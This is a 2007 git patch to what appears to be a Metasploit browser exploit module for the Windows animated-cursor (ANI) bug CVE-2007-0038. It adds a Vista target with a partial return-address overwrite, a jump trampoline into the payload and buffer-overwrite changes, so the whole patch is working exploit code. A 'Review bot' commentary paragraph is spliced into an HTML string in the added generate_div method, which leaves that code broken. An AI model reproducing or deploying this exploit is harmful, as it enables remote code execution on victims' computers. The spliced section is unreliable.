From 6cfab21bcbc75166e33315595ede06e7b5946813 Mon Sep 17 00:00:00 2001 From: Matt Miller Date: Sun, 1 Apr 2007 20:33:35 +0000 Subject: [PATCH] fixes for Vista, brute forcing git-svn-id: file:///home/svn/framework3/trunk@4598 4d416f70-5f16-0410-b530-b9f4589650da --- .../browser/ani_loadimage_chunksize.rb | 85 +++++++++++-------- 1 file changed, 48 insertions(+), 37 deletions(-) diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb index 5050262024..c2b4f27b97 100644 --- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb @@ -96,18 +96,20 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote # # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start - # of the RIFF itself. + # of the RIFF chunk itself. The length field of the RIFF chunk + # tag contains a short jump into an embedded riff chunk that + # makes a long relative jump into the actual payload. # - - # The RIFF magic bytes and the size of the riff file are - # executed which then bounce through. - # - # 1. Partial overwrite return with the address of a jmp dword [ebx] - # 2. Executes the first few bytes of the RIFF chunk and then - # does a jmp $+0x16 - # 3. Executes a relative jump to the start of the payload - # itself. - [ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ] + [ 'Windows Vista user32.dll 6.0.6000.16386', + { + 'Ret' => 0x700b, + 'Len' => 2, + + # On Vista, the pages that contain the RIFF are read-only. + # In-place decoders cannot be used. + 'EncoderType' => Msf::Encoder::Type::Raw + } + ] ], 'DisclosureDate' => 'Mar 28 2007', 
@@ -144,29 +146,15 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote "" + rand_text_alphanumeric(rand(128)+1) mytargs = (target.name =~ /All Targets/) ? targets : [target] - - mytargs.each_index do |i| - - next if not mytargs[i].ret - - html << "
" + - generate_padding() + - "
" + + if target.name =~ /All Targets/ + targets.each_index { |i| + next if not targets[i].ret + + html << generate_div(gext, i) + } + else + html << generate_div(gext, target_index) end html << "" @@ -191,6 +179,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote handler(cli) end + def generate_div(gext, targ) + "
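Review bot: `mytargs` becomes a dead assignment in this hunk: the context line `mytargs = (target.name =~ /All Targets/) ? targets : [target]` is kept, but the new `if`/`else` re-evaluates `target.name =~ /All Targets/` and indexes `targets` / `target_index` directly, so no added line reads it (the removed loop appears to have been its only reader). Either delete that line or iterate `mytargs` so the target-selection test is written once. The new loop also uses `{ }` for a multi-line block and `next if not ...`; `targets.each_index do |i|` / `next unless targets[i].ret` / `end` is the conventional form. The enclosing method begins before this hunk.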
" + + generate_padding() + + "
" + end + def generate_ani(payload, target) # Build the first ANI header @@ -208,10 +217,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote if (target.name =~ /Vista/) # Vista has ebp=80, eip=84 - anih_b = anih_a + rand_text(84-anih_a.length) + anih_b = rand_text(84) - # Overwrite locals with invalid pointers - anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3 + # Overwrite local counter variable and pointers + anih_b[68, 12] = [0].pack('V') * 3 else # XP/2K has ebp=76 and eip=80 anih_b = anih_a + rand_text(80-anih_a.length) @@ -226,6 +235,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote # Begin the ANI chunk riff = "ACON" + # Calculate the data offset for the trampoline chunk and add + # the trampoline chunk if we're attacking Vista if target.name =~ /Vista/ trampoline_doffset = riff.length + 8